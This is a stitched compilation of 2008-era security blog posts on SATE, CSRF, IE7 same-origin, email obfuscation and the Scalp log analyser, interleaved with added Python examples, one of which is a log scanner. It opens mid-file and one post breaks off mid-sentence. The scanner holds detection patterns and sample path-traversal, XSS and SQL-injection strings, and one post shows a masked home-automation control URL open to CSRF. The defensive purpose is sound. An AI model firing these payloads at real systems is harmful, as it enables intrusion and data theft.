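class Circle(Shape):
    def __init__(self, center, radius=RAD_MAX):
        self.center, self.radius = center, radius


class DiskHole(Shape):
    def __init__(self, center, radius, small_radius=RAD_SMALL):
        self.center, self.radius, self.small_radius = center, radius, small_radius


class DDFactory(object):
    """Data driven factory: register classes, then ask for the class whose
    constructor is satisfied by a given set of field names."""

    def __init__(self):
        self.registrar = {}

    @staticmethod
    def defaults_values(cls):
        """Inspect cls.__init__ and return (argument names, {name: default}),
        dropping 'self' and any *args/**kwargs, which cannot be matched by name."""
        params = list(inspect.signature(cls.__init__).parameters.values())[1:]
        args, defaults = [], {}
        for p in params:
            if p.kind in (p.VAR_POSITIONAL, p.VAR_KEYWORD):
                continue
            args.append(p.name)
            if p.default is not inspect.Parameter.empty:
                defaults[p.name] = p.default
        return args, defaults

    def register(self, cls):
        s_cls = str(cls)
        args, defaults = DDFactory.defaults_values(cls)
        if s_cls not in self.registrar:
            self.registrar[s_cls] = {'class': cls, 'args': args, 'defaults': defaults}

    def get(self, fields):
        """Matching rule (my assumption): a class is a candidate when every field is
        one of its constructor arguments and every argument without a default is
        present; among candidates, the one leaving the fewest defaulted arguments
        unfilled wins. Returns the class (the ctor), or None when nothing matches."""
        wanted = set(fields)
        best, best_score = None, None
        for entry in self.registrar.values():
            args = set(entry['args'])
            required = args - set(entry['defaults'])
            if not (required <= wanted <= args):
                continue
            score = len(args - wanted)          # defaulted arguments left unfilled
            if best is None or score < best_score:
                best, best_score = entry['class'], score
        return best


def build_demo_factory():
    factory = DDFactory()
    for cls in (Shape, Circle, DiskHole):
        factory.register(cls)
    return factory


if __name__ == "__main__":
    factory = build_demo_factory()
    print(factory.get(['center', 'radius']).__name__)                  # Circle
    print(factory.get(['center', 'radius', 'small_radius']).__name__)  # DiskHole
    # The class is what you keep when instantiating millions of rows:
    ctor = factory.get(['center', 'radius'])
    print(ctor(center=(0, 0), radius=2.5).radius)
```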

==> NIST Static Analysis Tool Exposition special publication released

http://rgaucher.info/feed/rss2 "The NIST SAMATE project conducted the first Static Analysis Tool Exposition (SATE) in 2008 to advance research in static analysis tools that find security defects in source code. The main goals of SATE were to enable empirical research based on large test sets and to encourage improvement and speed adoption of tools. The exposition was planned to be an annual event."

SATE 2008 was one of my last projects at NIST. I really enjoyed working on this project from the beginning; it was challenging especially because we had to create so many artifacts to make the tools report the weaknesses the same way, integrate them all together and provide ways for assessors to make meaningful reviews. In a nutshell, we selected 6 different open-source programs (3 in C, 3 in Java) and had tool vendors run their tool on these test cases. Tool vendors were allowed to customize their tool if their tool provides such capability. Fortify was the only vendor who created a custom rule (to help the tool with a validation routine for MVNForum). Our goal was then to combine the results all together and analyze them: provide information on the correctness of the tools. If you are interested, you can download the SATE data and the NIST SATE Special Publication. Thanks to all the SAMATE team for this effort, and especially Vadim Okun and Paul E. Black. For more information, you can reach the SATE page at NIST.

==> HTML 5 current browsers implementation support

http://rgaucher.info/feed/rss2 Firefox 3.1beta has been released today, with the support of two HTML 5 elements: audio and video. Gareth and I exchanged some messages on twitter about the current support of HTML 5 by the different engines. The first document I found (well, asking on the #whatwg IRC chan) is the Comparison of layout engines you can find on Wikipedia; they also pointed me to a wiki that WhatWG maintains: Implementations in Web browsers. These are pretty incomplete documents and I decided then to create a mapping between the current WhatWG document and the support of the browsers. This is possible because in the current document, they report the implementation status of the different items. Anyway, here is a table I assembled, containing the latest information about the HTML5 implementations in the current browser engines.

I also want to say that even if the WASC Script Mapping project has looked quite inactive for some time now, I will definitely continue it. I'm actually waiting to finish a couple of other projects I participate in, especially the WASC Threat Classification 2 and the Web Application Security Scanner Evaluation Criteria. I expect to get started again on Script Mapping during this summer...

EDIT: I will maintain the current list of HTML5 implementations in current browsers: HTML5. March 30.
+ twitter is quite cool to follow/interact, feel free to follow me at @rgaucher

==> SHA-3 reference implementations buffer overflows

http://rgaucher.info/feed/rss2 Fortify just posted a nice blog post about the audit they did on several reference implementations that compete for being the next NIST SHA-3. They do not release much information on their findings: only one is described. I would really have liked to see how powerful the analysis was (if it was) to find these problems. It could be nice too to see other tool vendors, such as Grammatech, Klocwork, Coverity, etc., do the same, and then start another competition ;) I'd really like to emphasize the conclusions in the Fortify blog post:

"Reference implementations don't disappear, they serve as a starting point for future implementations or are used directly. A bug in the RSA reference implementation was responsible for vulnerabilities in OpenSSL and two separate SSH implementations. They can also be used to design hardware implementations, using buffer sizes to decide how much silicon should be used. The other consideration is speed, which will be a factor in the choice of algorithm. The fix for the MD6 buffer issues was to double the size of a buffer, which could degrade the performance. On the other hand, memory leaks could slow an implementation. A correct implementation is an accurate implementation."

==> When CAPTCHA fails...

http://rgaucher.info/feed/rss2 Some time ago, I was amazed by the difficulty of a CAPTCHA implemented by rapidshare. Well, today I came across one which is even worse. We all know that using a CAPTCHA is very bad from a usability point of view, but without them, spammers would easily add junk to your database. But it's even worse when the CAPTCHA software is not working properly... Sure, you won't get any spammers here... nor regular users. Just to avoid confusion or misinterpretation, even if you refresh/clear cache/etc. you will get this message. And no, 'ERROR' is not the solution of the CAPTCHA. Hope that phishtank will fix that soon... We see many different CAPTCHAs on the web, some are good, some not. I do not know why people keep developing their own simplistic CAPTCHA when there is a good service like the one provided by reCAPTCHA. This CAPTCHA is pretty solid and also adds an audio version (way better for accessibility).

==> CIA spamming security groups: Be a part of a mission that’s larger than all of us.

http://rgaucher.info/feed/rss2 "Hello Romain, The Central Intelligence Agency would like you to consider a career with the National Clandestine Service. The CIA's National Clandestine Service seeks qualified applicants to serve our country's mission abroad. Our careers offer rewarding, fast-paced, and high impact challenges in intelligence collection on issues of critical importance to US national security. Applicants should possess a high degree of personal integrity, strong interpersonal skills, and good written and oral communication skills. We welcome applicants from various academic and professional backgrounds. Do you want to make a difference for your country? Are you ready for a challenge? All applicants for National Clandestine Service positions must successfully undergo several personal interviews, medical and psychological exams, aptitude testing, a polygraph interview, and a background investigation. Following entry on duty, candidates will undergo extensive training. US citizenship required. An equal opportunity employer and a drug-free work force. For more information and to apply, visit: www.cia.gov You can make a world of difference."

C'mon guys, I'm not even a US citizen... So yeah, the CIA is looking for security guys by spamming LinkedIn groups. Anything wrong in that process?

==> SSL Fails! SSLFail.com

http://rgaucher.info/feed/rss2 Marcin and Tyler just started a new website, which is kind of fun: sslfail.com (wall of shame of SSL certificates?) So now, Google & co, fix your certificates :P

==> Every-day's CSRF: Sorry, I turned off your christmas tree lights

http://rgaucher.info/feed/rss2 Today, a friend of mine was really proud to show me the home automation installation he just bought. Well, since he lives in France and I am in DC, he showed me the web interface that was able to control the lights etc. in his house. As he wanted to test this domotic system, he only plugged his Christmas tree lights into the system. Well, maybe I'm only seeing bad stuff around me, but... déformation professionnelle, we'll say! It was so easy to make it blink with a simple script that I showed it to him. So, every 5 seconds, it would change the state. Anyway, this CSRF is not a big deal for him since it's only the Christmas tree lights, it's only a temporary installation and well, it's fun. But after a simple Google search, I found another site like my friend's. The URL that Google returns is:

    http://XXX.XXX.XXX.XXX:88/control_exe.htm;3;1;ON

which is basically turning on some device... :) Also, not only does this application have tons of CSRF, it also has a nice stored XSS which lets you do whatever you want with it! And btw, since the Google robot reported this, it means that every time it crawls the website (or at least, reaches that particular URL), it will set the device ON :) Web security enters your house, f34rs!

==> IE7, no Same Origin Policy when the script/file is on your file system

http://rgaucher.info/feed/rss2 It's been such a long time since I last posted here. I've been quite busy with the new job at Cigital and all its implications. Anyway, this morning, a colleague of mine showed me a piece of JavaScript he used to create a request to another website (actually, this was just to do in JavaScript what I did in Python previously). This totally bugged me. He has been able to craft a request (using XHR) from a local file to a distant website... WTF with SOP? After some tests, it seems it's only working with IE7, but well, I didn't test with many browsers, only with Firefox 3, Chrome and IE7. So, I have no idea if this has been known for a long time or not, but well, I haven't seen this before. A simple POC is available here: xhr_SOP_ie7.html

==> Internet User Privacy Values Survey

http://rgaucher.info/feed/rss2 I know how tough and crucial it is to get participants for a survey, so it would be great if you guys could take this and spread it a little bit more...

"Researchers at ThePrivacyPlace.Org are conducting an online survey about privacy policies and user values. The survey is supported by an NSF ITR grant (National Science Foundation Information Technology Research) and was first offered in 2002. We are offering the survey again in 2008 to reveal how user values have changed over the intervening years. The survey results will help organizations ensure their website privacy practices are aligned with current consumer values. The URL is: http://theprivacyplace.org/currentsurvey We need to attract several thousand respondents, and would be most appreciative if you would consider helping us get the word out about the survey, which takes about 5 to 10 minutes to complete. The results will be made available via our project website (http://www.theprivacyplace.org/). Prizes include $100 Amazon.com gift certificates sponsored by Intel Co. and gifts from IBM and Blue Cross and Blue Shield of North Carolina. On behalf of the research staff at ThePrivacyPlace.Org, thank you!"

==> Last week at NIST

http://rgaucher.info/feed/rss2 Every good thing has an end... this is the time for me to leave NIST. So I will be a security consultant at Cigital, Inc. I've been working at NIST for 2 years and a half as a Guest Researcher in the SAMATE Project. I originally came to NIST to do mostly statistical analysis or so, but it changed a lot! I started by building the SAMATE Reference Dataset website and this is how I started to learn about "security", by working with flawed source code. This was very obscure to me (I guess like every computer scientist specialized in applied mathematics) and I learned a lot about weaknesses, vulnerabilities, "how to find them?", scanners etc.

My first real security related work was about the Web Application Security Scanner Specification and then, designing a way of testing web app scanners:
* a test suite with seeded vulnerabilities
* checking the types of attacks
* trying to explain the false negatives of the tools by monitoring what/where the scanner went in the application at a logical level, such as "did the tool log in successfully? did it generate a couple of errors, did it try many times?"
The goal of this 3-component analysis is to really be able to understand what the tool is doing, and if it didn't find a particular vulnerability, why?

One of the best moments I had at NIST was when we did the Static Analysis Tool Exposition. I was part of the organizers and from the beginning, it was a real challenge: choosing good test cases, criteria to evaluate the reports, etc. Of course, SATE 2008 was not perfect, we made many mistakes, but at least we tried, we had some results and we learned a lot. I have good hopes for the next SATE, even though this is really challenging on many aspects:
1. Not making people think/act like this is a competition (we sometimes see people claiming they won SATE 2008, but... well, there would be many things to say to them)
2. Having strong evaluation criteria (I guess this is challenging every time human assessment is part of the game)
3. Solving the way to present data to the evaluators. We couldn't have the GUI of the tools etc., so our analysis (as evaluators) was really limited and we sometimes had to guess what the exact weakness report was
4. and finally, having more resources and help for evaluating the weaknesses reported by the tools (47k this year, one month to evaluate...)

Oh well, I will of course continue to follow what the SAMATE team is doing, even though I will be away and busy with other interesting stuff, and I'm really looking forward to seeing the results of the current study we are running on the function-wise weakness characterization. But for now, it's time for me to get some vacation, going back to France for almost one month, getting my worker visa etc.

==> Scalp 0.4: apache log based attack analyzer, updated

http://rgaucher.info/feed/rss2 Some time ago, I released a first version of a tool named Scalp. The tool analyzed the Apache HTTPD logs in order to examine whether there were attacks or not. The attack detection is based on the rules provided by the PHP-IDS project. Today, I took time to finalize the Python version of Scalp a bit more. Version 0.4 can now be downloaded on the project web page. This version includes a couple of features such as:
* Output in HTML, XML or TEXT format
* Specify the output directory
* Using a random sample for scanning the log file
* Trying to decode the potential attack vectors
* Returning the lines that couldn't be examined
And then, with some other options that already existed in the previous versions,
* Select a time frame
* Select classes of potential attacks
the tool seems to approach a final version. I won't add more into it since I want to keep it simple and quite fast (I may add optimizations if I find some). Also, the C++ version is on its way and mostly done with the same set of options; the code is checkable using the Google repository, but I still have to work on options and time-frame specification.

Scalp 0.4:
* HTML report example
* Download the python script

==> PyQt and WebKit integration: unexpected limitation [fixed]

http://rgaucher.info/feed/rss2 For those who don't know Qt, this is a huge and mature framework for developing GUIs & more on different platforms (read: multi-platform). I already did some development using Qt and C++ (especially when I was working at the GERAD). As, with Marcin, we wanted to have a look at some technologies that involve a browser etc., I decided to look at Qt and the almost-fresh WebKit integration. The integration of WebKit in a framework like Qt allows the developer to embed in their application, supposedly in an easy manner, a browser that supports the basic web technologies which are HTML, CSS and JavaScript (it seems that Flash is going to be supported soon, and anyway, one can write one's own plugin in order to interact with some specific content). And indeed it is easy...

I used PyQt in order to develop a very simple prototype and see what we are able to do with this new technology. As I already know Python and Qt, it was easy for me to start and be kinda effective. So, in a few hours of work, documentation reading and trying to understand why and how the Python version of Qt was using such or such thing compared to the C++ version, I got this workable browser that allows dynamic JavaScript injection through a console, viewing the source and a simple encoding converter (click on the image to see the full screenshot):

At this point, I was actually very excited: less than 500 lines of Python in order to create that... was kinda worth a few days of work in order to create a useful tool: the Swiss Army Knife of the Pen-Test. My next and logical step was to extend the current tool in order to have tamper-data-like capabilities (e.g. being able to hijack the HTTP request and then tamper with the GET/POST data). And here come the problems... it's apparently not possible to get the current request and then reply when using the WebKit widget in Qt (QWebView). I tried to use a delegate QNetworkAccessManager in order to overload the POST/GET request since this object is used to set the proxies etc., but nothing... I think they just didn't open this possibility for some reason. Oh well, I then stopped developing this prototype and will try to contact Qt experts/developers just to figure out if there is another way to do it. I thought of a solution which would be to have my own HTTP manager using QHttp in order to do the request, get the response etc. and then send the content to the browser; this would be great in a webapps scanner, but for the use I wanted, that would create huge limitations for the user interaction and especially for Ajax applications. So, the prototype stays here until I find a solution or Qt opens their network management under the QWebView widget...

Fixed: An update to let you know that I actually fixed the problem. It was really stupid of me, but I should really check whether the methods are virtual or not before overloading them :/ shame on me! So now, I am able to have a firefox/tamper-data/firebug in one tool :)

==> And so you wanted to protect your email address on your website...

http://rgaucher.info/feed/rss2 People start thinking of how to prevent spam when they're building websites, that's a fact and that's very good indeed. The only problem is when they don't actually know how a bot would handle the HTML page... For instance, I was surfing on qik.com and saw this little piece of JavaScript meant to protect the email address from exposure:

    <script type="text/javascript">
    //<![CDATA[
    document.write('<a href="mailto:XXXX@qik.com"\
    title="Send us an email!">XXXX@qik.com<\/a>');
    //]]>
    </script>

As the readers of this blog may know, the bot process is really easy.... download the HTML page (crawling) and then try to extract the email address (parsing). It is just obvious that a bot wouldn't bother with the CDATA tag or with the fact that this is embedded in JavaScript code; if I had to write a bot, I would have a very lossy parsing in order to gather as much information as possible, and I wouldn't care about "in which context am I?". Also, according to some testing I'm doing, I can tell you that if this was a URL, the Google bots would get it... So please, obfuscate this just a bit... some examples can be found on fuckthespam.com

==> Why the "line of code" is indeed a good metric

http://rgaucher.info/feed/rss2 When I first learned about source code metrics, I was amazed by people using the line of code for comparing software. It was for me a lack of imagination. At the beginning of the week, I started a small and fast experiment: extracting metrics from the SATE 2008 test cases. This experiment focuses on function-wise properties and therefore, I have to extract for each function a couple of metrics:
* McCabe's cyclomatic complexity, which computes the code complexity; this is indeed a good metric to estimate the difficulty that a human will have to understand a given piece of code (very important for security related problems)
* Lines of Code
* Lines of Comments
* Number of local variables
* Number of parameters (which represents the coercion between the function and the whole program)
* Number of function calls
* Number of functions that are ``sources''
* Number of functions that are ``sinks''
* Number of C standard functions (obviously, only for C test cases)
At first the line of code was implemented because it's an easy one to compute and it also gives an important value if we want to normalize the other metrics. We also decided to introduce the number of ``sources/sinks'' for studying input validation weaknesses later on... Anyway, after running some statistics on the output results, I was amazed to observe that the Pearson correlation coefficient between McCabe and Lines of Code was never less than 0.90 (which could be compared to 90% as a correlation rate) (but I have to say that there are huge limitations in the parsers we are using for extracting information, for instance, the C is not pre-processed etc.). This result is only valid for C test cases; actually, the average observed correlation in Java test cases is around 0.60...

Of course further statistical analysis will be necessary to conclude anything on this subject, and if we were unlucky with the test case selection, this may have been a source of the problem, but I don't think we were. Actually, it seems quite logical to think that these metrics are related: the longer the code is, the more complex in terms of tests, loops etc. it can be; there is indeed more chance that a longer code contains more cycles :) Oh well, I'll keep writing about it, especially since I expect to get results pretty soon...

==> Trie based fast and massive replacement (Algorithm)

http://rgaucher.info/feed/rss2 While working on the C++ version of scalp, I had to do massive simple transformations of a given text, i.e. replacements of words by others. Since the main way to do this (a loop which does one replacement at a time) is very inefficient, I decided to find something faster. I then came up with a tree based replacement algorithm; I believe this is kinda famous but I never heard about such an algorithm. It basically uses a non-compact trie in order to have an efficient search of the current word. The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to replace the words "ba", "me", "mp" in a text, the trie will be the following one:

The idea is then to iterate over all the characters in the text, and for each letter determine whether this is a possible word to replace or not (simply by looking if the letter is a child of the trie root). Then, we iterate over the next letters in the text in order to see if the sequence of letters is an actual word to replace or not (every time, the same methodology is used: look in the children at the current state of our iterator in the trie). This algorithm seems more efficient than the simple replace used in a loop since we will perform a descent in a tree and therefore replace a linear search by a logarithmic one.

I ran a little statistical comparison between two algorithms: mine and the simple loop one. The test bed is quite simple and uses randomly generated text which contains the words to replace with a certain density. In order to create statistics, I varied all the sizes and I aggregated the results from the same dictionary size. So, for a given size of a dictionary (let's say, 200 words to replace), a text has been generated with a density that varies from 0.1 to 0.5 (from 10% to 50% of the words in the text will be words to replace) and finally, the size of the text varies from 25 to 200 words (and words are randomly generated to be from size 5 to 32). As I said previously, the results from the same dictionary size have been aggregated since I've seen in practice that the result mainly depends on the dictionary size (it also obviously depends on the size of the text, but as this is a constant for both algorithms, I can compute the mean of the different data to extract the average gain for a particular dictionary size). Finally, here is the curve that shows the logarithmic progression of the gain compared to the classical method:

The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation):

    void str_replace(string& where, const string& what, const string& by)
    {
        for (string::size_type i = where.find(what);
             i != string::npos;
             i = where.find(what, i + by.size()))
            where.replace(i, what.size(), by);
    }

and has been used M times (M is the size of the dictionary). I also decided to release a very early version of this replace algorithm (which is not templated yet): stree.h, which uses the great STL-friendly tree structure from Kasper Peeters. As for data information, here is the code I used to generate the
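The trie-based replacement and the post's test bed, reimplemented in Python as an added example (not the post's stree.h or its C++ harness): the longest-match rule, the dict-of-dicts trie layout and the random text generator are my own choices; the reference method is the per-word replace loop the post compares against.

```python
import random
import time


class TrieReplacer(object):
    """Single-pass, longest-match replacement of many words driven by a (non-compact)
    trie. Each node is a dict: child character -> node; the key None marks a complete
    word and holds its replacement."""

    def __init__(self, replacements):
        self.root = {}
        for word, by in replacements.items():
            if not word:
                raise ValueError("cannot replace the empty string")
            node = self.root
            for ch in word:
                node = node.setdefault(ch, {})
            node[None] = by

    def replace(self, text):
        out = []
        i, n = 0, len(text)
        while i < n:
            node = self.root.get(text[i])     # is this letter a child of the root?
            if node is None:
                out.append(text[i])
                i += 1
                continue
            # descend while the text keeps matching; remember the longest complete word
            end, by = (i + 1, node[None]) if None in node else (None, None)
            j = i + 1
            while j < n and text[j] in node:
                node = node[text[j]]
                j += 1
                if None in node:
                    end, by = j, node[None]
            if end is None:                   # partial match only: emit the letter, move on
                out.append(text[i])
                i += 1
            else:
                out.append(by)
                i = end
        return "".join(out)


def naive_replace(text, replacements):
    """The reference method: one full-text replace per dictionary word (M passes).
    It is sequential, so an earlier replacement can be rewritten by a later word."""
    for word, by in replacements.items():
        text = text.replace(word, by)
    return text


def make_test_bed(dict_size, density, text_words, seed=0):
    """Random test bed like the post's: a dictionary of dict_size random words (5..32
    letters) and a text of text_words words, a fraction `density` of which come from
    the dictionary. Constructed data, seeded for reproducibility."""
    rng = random.Random(seed)
    alphabet = "abcdefghijklmnopqrstuvwxyz"
    word = lambda: "".join(rng.choice(alphabet) for _ in range(rng.randint(5, 32)))
    dictionary = {word(): word() for _ in range(dict_size)}
    keys = list(dictionary)
    text = " ".join(rng.choice(keys) if rng.random() < density else word()
                    for _ in range(text_words))
    return dictionary, text


def timing(dict_size=200, density=0.3, text_words=200):
    """Seconds taken by each method on one generated test bed: (naive, trie)."""
    dictionary, text = make_test_bed(dict_size, density, text_words)
    t0 = time.perf_counter()
    naive_replace(text, dictionary)
    t1 = time.perf_counter()
    TrieReplacer(dictionary).replace(text)
    t2 = time.perf_counter()
    return t1 - t0, t2 - t1


if __name__ == "__main__":
    r = TrieReplacer({"ba": "X", "me": "Y", "mp": "Z"})
    print(r.replace("bamp me mb"))   # XZ Y mb
    print("naive %.6fs, trie %.6fs" % timing())
```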

==> A morning at work: Content-Disposition blocked!

http://rgaucher.info/feed/rss2 One morning, I woke up, and all the websites using a download system didn't work anymore. Yeah, this is what I've seen. I guess I don't need to tell you that it was such a pain and that all the downloading systems on the different websites we have were not working anymore. Such a big stress thinking that everything is broken at first, then after some time, I realized that the problem is about the Content-Disposition header field which is dropped. I wouldn't say that I would like to thank the admin who did not tell people about the modification... Anyway, I guess this is every time like that?

The Content-Disposition HTTP header field is used to tell the browser how the data is to be presented. I basically use it in order to force a download, using such a PHP script:

    <?php
    // download.php
    // some checks on the $fname variable to be sure
    // it exists and is in the allowed directories...
    header("Pragma: public");
    header("Expires: 0");
    header("Cache-Control: must-revalidate, pre-check=0");
    header("Content-Type: application/octet-stream");
    header("Content-Length: " . filesize($fname));
    header("Content-Disposition: attachment; filename=" . basename($fname));
    header("Content-Description: File Transfer");
    @readfile($fname);
    exit;
    ?>

Now, if you cannot send the Content-Disposition field, the browser will download a file called "download.php". A quite simple solution is to fool the browser by making the name of the reachable URI the same as the file it should download, using mod_rewrite:

    RewriteEngine On
    RewriteBase /mydir
    RewriteRule ^download/([^/]+)$ /mydir/download.php?file_redir=$1

And just a simple modification in the original script in order to detect the "file_redir" GET variable. But since we don't want to modify all the (generated or not) HTML files, we need to make the redirection automatic:

    <?php
    // download.php
    // some checks on the $fname variable to be sure
    // it exists and is in the allowed directories...
    if (isset($_GET['file_redir'])) {
        $fname = $_GET['file_redir'];
        // checks for good files (careful of directory traversal etc.)
        header("Pragma: public");
        header("Expires: 0");
        header("Cache-Control: must-revalidate, pre-check=0");
        header("Content-Type: application/octet-stream");
        header("Content-Length: " . filesize($fname));
        header("Content-Description: File Transfer");
        @readfile($fname);
        exit;
    } else {
        header("Location: /mydir/download/$fname");
        exit;
    }
    ?>

Then you don't have to change all your pages. This is of course a (not so?) temporary solution since the server does extra work in order to reach the same state, the download of the file, but well, it does the job to fool the browser...
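
The two things the script above leaves as comments, the "is it in the allowed directories" check and a safe filename in the Content-Disposition value, as an added Python example. This is not the post's PHP code; the directory layout, file names and helper names (resolve_download, download_headers, demo) are constructed for the example. The check canonicalises both the allowed directory and the requested path with realpath before comparing them, so "../" sequences, absolute paths and symlinks that point outside the directory all fail the same prefix test.

```python
"""Allowed-directory check and forced-download headers. Added example; not the
post's download.php. Paths and files below are constructed for the demo."""

import os
import re
import tempfile
from typing import Dict, Optional


def resolve_download(allowed_dir: str, requested: str) -> Optional[str]:
    """Map a client-supplied file name onto a regular file under allowed_dir.

    Returns the canonical absolute path, or None when the name resolves
    outside the directory (traversal, absolute path, symlink escape) or
    does not name a regular file."""
    base = os.path.realpath(allowed_dir)
    # realpath collapses ".." and follows symlinks, so the comparison is made
    # on where the path really lands, not on the string the client sent.
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return None
    if not os.path.isfile(target):
        return None
    return target


def download_headers(path: str) -> Dict[str, str]:
    """Headers equivalent to those download.php sends for a forced download."""
    # Restrict the advertised name to a conservative character set so the
    # header value cannot carry quotes, CR/LF or path separators.
    name = re.sub(r"[^A-Za-z0-9._-]", "_", os.path.basename(path))
    return {
        "Content-Type": "application/octet-stream",
        "Content-Length": str(os.path.getsize(path)),
        "Content-Disposition": f'attachment; filename="{name}"',
        "Cache-Control": "must-revalidate",
    }


def demo() -> Dict[str, Optional[str]]:
    """Build a constructed tree (files/report.pdf inside, secret.txt outside)
    and exercise the check with a good name and three bad ones."""
    root = tempfile.mkdtemp()
    files_dir = os.path.join(root, "files")
    os.mkdir(files_dir)
    with open(os.path.join(files_dir, "report.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 constructed sample\n")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("outside the allowed directory\n")
    return {
        "ok": resolve_download(files_dir, "report.pdf"),
        "traversal": resolve_download(files_dir, "../secret.txt"),
        "absolute": resolve_download(files_dir, "/etc/hostname"),
        "missing": resolve_download(files_dir, "nope.pdf"),
    }


if __name__ == "__main__":
    results = demo()
    for label, path in results.items():
        print(f"{label:10} -> {path}")
    print(download_headers(results["ok"]))
```

Only the path returned by resolve_download is ever handed to the code that reads the file; the raw query value is never used after the check.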

==> Scalp: apache log based attack analyzer

http://rgaucher.info/feed/rss2 I started a project some time ago in order to parse Apache log files and detect attacks, etc. The attack recognition is based on the PHP-IDS filters. The first release version is written in Python (http://code.google.com/p/apache-scalp/downloads/list) but I started (well, almost finished) a faster multi-threaded C++ version in order to be able to handle bigger log files. The main project page is reachable here: http://code.google.com/p/apache-scalp

    Scalp the apache log! - http://code.google.com/p/apache-scalp
    usage:  ./scalp.py --log|-l --filters|-f --period [OPTIONS] --attack
      --log       |-l:  the apache log file './access_log' by default
      --filters   |-f:  the filter file './default_filter.xml' by default
      --exhaustive|-e:  will report all type of attacks detected and not stop at the first found
      --period    |-p:  the period must be specified in the same format as in the Apache logs
                        using * as wild-card
                        ex: 04/Apr/2008:15:45;*/Mai/2008
                        if not specified at the end, the max or min are taken
      --html      |-h:  generate an HTML output
      --xml       |-x:  generate an XML output
      --text      |-t:  generate a simple text output (default)
      --except    |-c:  generate a file that contains the non examined logs due to the main regular expression;
                        ill-formed Apache log etc.
      --attack    |-a:  specify the list of attacks to look for
                        list: xss, sqli, csrf, dos, dt, spam, id, ref, lfi
                        the list of attacks should not contains spaces and be comma separated
                        ex: xss,sqli,lfi,ref
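
The pipeline the usage text implies (parse each line with one main regular expression, set aside what it cannot parse, keep lines inside a period, then run the attack filters and stop at the first hit unless asked to be exhaustive), as an added Python example. This is not scalp's own code and it does not load the PHP-IDS filter set; the three filters are constructed, deliberately narrow illustrations keyed by the attack class names scalp uses (xss, sqli, dt), and the log lines are constructed too. Requests are URL-decoded once before matching so an encoded payload and its plain form are treated alike.

```python
"""Apache access-log scanning in the spirit of scalp. Added example, not scalp's
code; filters and sample log lines are constructed."""

import re
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?$'
)

# Constructed filters applied to the URL-decoded request line (not PHP-IDS rules).
FILTERS = {
    "xss": re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE),
    "sqli": re.compile(r"'\s*(?:or|and)\b|union\s+select|--\s*$", re.IGNORECASE),
    "dt": re.compile(r"\.\./"),
}

# Constructed sample: three suspicious requests, one benign one, one malformed line.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Apr/2008:15:46:12 +0200] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [04/Apr/2008:15:47:01 +0200] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 210 "-" "curl/7.19"
10.0.0.9 - - [04/Apr/2008:15:48:33 +0200] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 840 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Apr/2008:09:01:00 +0200] "GET /item.php?id=1' OR '1'='1 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
this line is not an apache log entry
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def parse_time(stamp: str) -> datetime:
    """Apache's timestamp, e.g. 04/Apr/2008:15:46:12 +0200 (timezone-aware)."""
    return datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")


def classify(request: str, attacks: Tuple[str, ...], exhaustive: bool) -> List[str]:
    """Attack classes whose filter matches; stops at the first unless exhaustive (like -e)."""
    decoded = unquote(request)
    found: List[str] = []
    for name in attacks:
        if FILTERS[name].search(decoded):
            found.append(name)
            if not exhaustive:
                break
    return found


def scan(log_text: str, attacks: Tuple[str, ...] = ("xss", "sqli", "dt"),
         since: Optional[datetime] = None, until: Optional[datetime] = None,
         exhaustive: bool = False):
    """Return (hits, rejected): flagged records inside the period, and the lines the
    main regular expression could not parse (what an --except file would hold)."""
    hits: List[Dict] = []
    rejected: List[str] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            rejected.append(line)
            continue
        ts = parse_time(rec["time"])
        if (since is not None and ts < since) or (until is not None and ts > until):
            continue
        found = classify(rec["request"], attacks, exhaustive)
        if found:
            hits.append({"host": rec["host"], "time": ts,
                         "request": rec["request"], "attacks": found})
    return hits, rejected


if __name__ == "__main__":
    flagged, bad = scan(SAMPLE_LOG)
    for hit in flagged:
        print(hit["time"].isoformat(), hit["host"], hit["attacks"], hit["request"])
    print(f"{len(bad)} line(s) not matched by the main regular expression")
```

The rejected list matters as much as the hits: a line the main regular expression cannot parse is invisible to every filter, which is why scalp exposes it through --except rather than dropping it silently.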

==> My talk at SAW: Automated Evaluation of source code analyzer output

http://rgaucher.info/feed/rss2 It has been some time since I last posted on my blog... well, I've been busy, especially with the end of SATE, and oh well! had vacation :) Anyway, at the next Static Analysis Workshop this Thursday, we're gonna talk about the SATE experiment and the observations/results we could get from it. I am then gonna talk about a tool I wrote in order to probe whether a reported weakness is a false positive: this is the Automated Evaluation. The main idea of the Automated Evaluation is to get some information on the source code and, under some assumptions, try to reach a conclusion on the correctness of the piece of code. Behind all the reasoning of that particular tool, my approach had to be radically different from a classical SCA; otherwise this would have been like creating a new SCA, which would have been obviously useless. The context of this automated evaluation is limited to buffer overflows and it can only work for proving false positives! So basically, I am reading the source code from the reported sink to the possible sources and grabbing the actions that possibly affect the variables which have a role in the code. These actions are like:
* Allocation of a destination buffer
* Computing the size of the source buffer(s)
* Test for NULL
* Test that involves the size of the buffers...
* ... and some others
